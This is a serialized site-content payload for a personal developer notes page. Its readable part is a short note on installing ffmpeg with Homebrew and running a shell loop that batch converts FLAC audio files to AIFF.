version",{},"\u002Fnotes\u002Ffrontend\u002Fhow-to-upgrade-nuxt-3",{"title":1179,"description":1218},{"loc":1220},"notes\u002Ffrontend\u002Fhow-to-upgrade-nuxt-3",[1225,43,1226],"nuxt","cli","dM5MoKBMK4iO3YLcsO41-7FRCbfQBNHrd0MQxnAIkWM",{"id":1229,"title":1230,"author":6,"body":1231,"date":1344,"description":1345,"extension":335,"image":336,"meta":1346,"navigation":85,"path":1347,"seo":1348,"sitemap":1349,"stem":1350,"tags":1351,"__hash__":1355},"content_en\u002Fnotes\u002Fdevops\u002Fbatch-convert-music-files-flac-aiff-ffmpeg.md","Batch converting FLAC to AIFF using ffmpeg",{"type":8,"value":1232,"toc":1342},[1233,1236,1239,1255,1266,1339],[11,1234,1230],{"id":1235},"batch-converting-flac-to-aiff-using-ffmpeg",[15,1237,1238],{},"You need ffmpeg to be installed. For macOS:",[39,1240,1242],{"className":1187,"code":1241,"language":1189,"meta":44,"style":44},"brew install ffmpeg\n",[19,1243,1244],{"__ignoreMap":44},[48,1245,1246,1249,1252],{"class":50,"line":51},[48,1247,1248],{"class":104},"brew",[48,1250,1251],{"class":78}," install",[48,1253,1254],{"class":78}," ffmpeg\n",[15,1256,1257,1258,1261,1262,1265],{},"This command will convert all ",[19,1259,1260],{},"*.flac"," files to ",[19,1263,1264],{},"*.aiff",":",[39,1267,1269],{"className":1187,"code":1268,"language":1189,"meta":44,"style":44},"for i in *.flac; do ffmpeg -i \"$i\" -write_id3v2 1 -c:v copy \"${i%.*}.aiff\"; done\n",[19,1270,1271],{"__ignoreMap":44},[48,1272,1273,1276,1279,1282,1285,1288,1291,1294,1297,1300,1303,1306,1309,1312,1315,1318,1321,1324,1327,1329,1331,1334,1336],{"class":50,"line":51},[48,1274,1275],{"class":68},"for",[48,1277,1278],{"class":54}," i ",[48,1280,1281],{"class":68},"in",[48,1283,1284],{"class":78}," *.flac",[48,1286,1287],{"class":54},"; ",[48,1289,1290],{"class":68},"do",[48,1292,1293],{"class":104}," ffmpeg",[48,1295,1296],{"class":117}," -i",[48,1298,1299],{"class":78}," \"",[48,1301,1302],{"class":54},"$i",[48,1304,1305],{"class":78},"\"",[48,1307,1308],{"class":117}," -write_id3v2",[48,1310,1311],{"class":117}," 1",[48,1313,1314],{"class":117}," -c:v",[48,1316,1317],{"class":78}," copy",[48,1319,1320],{"class":78}," \"${",[48,1322,1323],{"class":54},"i",[48,1325,1326],{"class":68},"%",[48,1328,26],{"class":78},[48,1330,192],{"class":68},[48,1332,1333],{"class":78},"}.aiff\"",[48,1335,1287],{"class":54},[48,1337,1338],{"class":68},"done\n",[328,1340,1341],{},"html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}",{"title":44,"searchDepth":65,"depth":65,"links":1343},[],"2022-08-10","One-liner to convert all FLAC files to AIFF format using ffmpeg on macOS",{},"\u002Fnotes\u002Fdevops\u002Fbatch-convert-music-files-flac-aiff-ffmpeg",{"title":1230,"description":1345},{"loc":1347},"notes\u002Fdevops\u002Fbatch-convert-music-files-flac-aiff-ffmpeg",[1352,1353,1226,1354],"ffmpeg","audio","macos","TAUWGNDcayHB2yDba8Sq8DH-TcIpYitPjo-XPI7ple0",[1357,1584],{"id":4,"title":5,"author":6,"body":1358,"date":333,"description":334,"extension":335,"image":336,"meta":1580,"navigation":85,"path":338,"seo":1581,"sitemap":1582,"stem":341,"tags":1583,"__hash__":345},{"type":8,"value":1359,"toc":1578},[1360,1362,1368,1374,1576],[11,1361,5],{"id":13},[15,1363,17,1364,22,1366,26],{},[19,1365,21],{},[19,1367,25],{},[15,1369,29,1370,33,1372,37],{},[19,1371,32],{},[19,1373,36],{},[39,1375,1376],{"className":41,"code":42,"language":43,"meta":44,"style":44},[19,1377,1378,1386,1396,1400,1408,1414,1426,1434,1440,1444,1448,1464,1474,1478,1482,1488,1496,1500,1504,1508,1512,1520,1524,1532,1544,1556,1568],{"__ignoreMap":44},[48,1379,1380,1382,1384],{"class":50,"line":51},[48,1381,55],{"class":54},[48,1383,59],{"class":58},[48,1385,62],{"class":54},[48,1387,1388,1390,1392,1394],{"class":50,"line":65},[48,1389,69],{"class":68},[48,1391,72],{"class":54},[48,1393,75],{"class":68},[48,1395,79],{"class":78},[48,1397,1398],{"class":50,"line":82},[48,1399,86],{"emptyLinePlaceholder":85},[48,1401,1402,1404,1406],{"class":50,"line":89},[48,1403,92],{"class":68},[48,1405,95],{"class":68},[48,1407,98],{"class":54},[48,1409,1410,1412],{"class":50,"line":101},[48,1411,105],{"class":104},[48,1413,108],{"class":54},[48,1415,1416,1418,1420,1422,1424],{"class":50,"line":111},[48,1417,114],{"class":68},[48,1419,118],{"class":117},[48,1421,121],{"class":68},[48,1423,124],{"class":104},[48,1425,127],{"class":54},[48,1427,1428,1430,1432],{"class":50,"line":130},[48,1429,133],{"class":54},[48,1431,136],{"class":117},[48,1433,139],{"class":54},[48,1435,1436,1438],{"class":50,"line":142},[48,1437,145],{"class":54},[48,1439,148],{"class":117},[48,1441,1442],{"class":50,"line":151},[48,1443,154],{"class":54},[48,1445,1446],{"class":50,"line":157},[48,1447,86],{"emptyLinePlaceholder":85},[48,1449,1450,1452,1454,1456,1458,1460,1462],{"class":50,"line":162},[48,1451,114],{"class":68},[48,1453,167],{"class":117},[48,1455,121],{"class":68},[48,1457,172],{"class":104},[48,1459,175],{"class":54},[48,1461,178],{"class":68},[48,1463,98],{"class":54},[48,1465,1466,1468,1470,1472],{"class":50,"line":183},[48,1467,186],{"class":68},[48,1469,189],{"class":54},[48,1471,192],{"class":68},[48,1473,195],{"class":54},[48,1475,1476],{"class":50,"line":198},[48,1477,154],{"class":54},[48,1479,1480],{"class":50,"line":203},[48,1481,86],{"emptyLinePlaceholder":85},[48,1483,1484,1486],{"class":50,"line":208},[48,1485,211],{"class":68},[48,1487,98],{"class":54},[48,1489,1490,1492,1494],{"class":50,"line":216},[48,1491,219],{"class":68},[48,1493,222],{"class":104},[48,1495,225],{"class":54},[48,1497,1498],{"class":50,"line":228},[48,1499,231],{"class":54},[48,1501,1502],{"class":50,"line":234},[48,1503,237],{"class":54},[48,1505,1506],{"class":50,"line":240},[48,1507,243],{"class":54},[48,1509,1510],{"class":50,"line":246},[48,1511,249],{"class":54},[48,1513,1514,1516,1518],{"class":50,"line":252},[48,1515,255],{"class":54},[48,1517,59],{"class":58},[48,1519,62],{"class":54},[48,1521,1522],{"class":50,"line":262},[48,1523,86],{"emptyLinePlaceholder":85},[48,1525,1526,1528,1530],{"class":50,"line":267},[48,1527,55],{"class":54},[48,1529,272],{"class":58},[48,1531,62],{"class":54},[48,1533,1534,1536,1538,1540,1542],{"class":50,"line":277},[48,1535,280],{"class":54},[48,1537,15],{"class":58},[48,1539,285],{"class":54},[48,1541,15],{"class":58},[48,1543,62],{"class":54},[48,1545,1546,1548,1550,1552,1554],{"class":50,"line":292},[48,1547,280],{"class":54},[48,1549,15],{"class":58},[48,1551,299],{"class":54},[48,1553,15],{"class":58},[48,1555,62],{"class":54},[48,1557,1558,1560,1562,1564,1566],{"class":50,"line":306},[48,1559,280],{"class":54},[48,1561,15],{"class":58},[48,1563,313],{"class":54},[48,1565,15],{"class":58},[48,1567,62],{"class":54},[48,1569,1570,1572,1574],{"class":50,"line":320},[48,1571,255],{"class":54},[48,1573,272],{"class":58},[48,1575,62],{"class":54},[328,1577,330],{},{"title":44,"searchDepth":65,"depth":65,"links":1579},[],{},{"title":5,"description":334},{"loc":338},[43,343,344],{"id":1178,"title":1179,"author":6,"body":1585,"date":1217,"description":1218,"extension":335,"image":336,"meta":1612,"navigation":85,"path":1220,"seo":1613,"sitemap":1614,"stem":1223,"tags":1615,"__hash__":1227},{"type":8,"value":1586,"toc":1610},[1587,1589,1601,1603,1608],[11,1588,1179],{"id":1184},[39,1590,1591],{"className":1187,"code":1188,"language":1189,"meta":44,"style":44},[19,1592,1593],{"__ignoreMap":44},[48,1594,1595,1597,1599],{"class":50,"line":51},[48,1596,1196],{"class":104},[48,1598,1199],{"class":78},[48,1600,1202],{"class":78},[15,1602,1205],{},[39,1604,1606],{"className":1605,"code":1209,"language":437},[435],[19,1607,1209],{"__ignoreMap":44},[328,1609,1214],{},{"title":44,"searchDepth":65,"depth":65,"links":1611},[],{},{"title":1179,"description":1218},{"loc":1220},[1225,43,1226],1776084468190]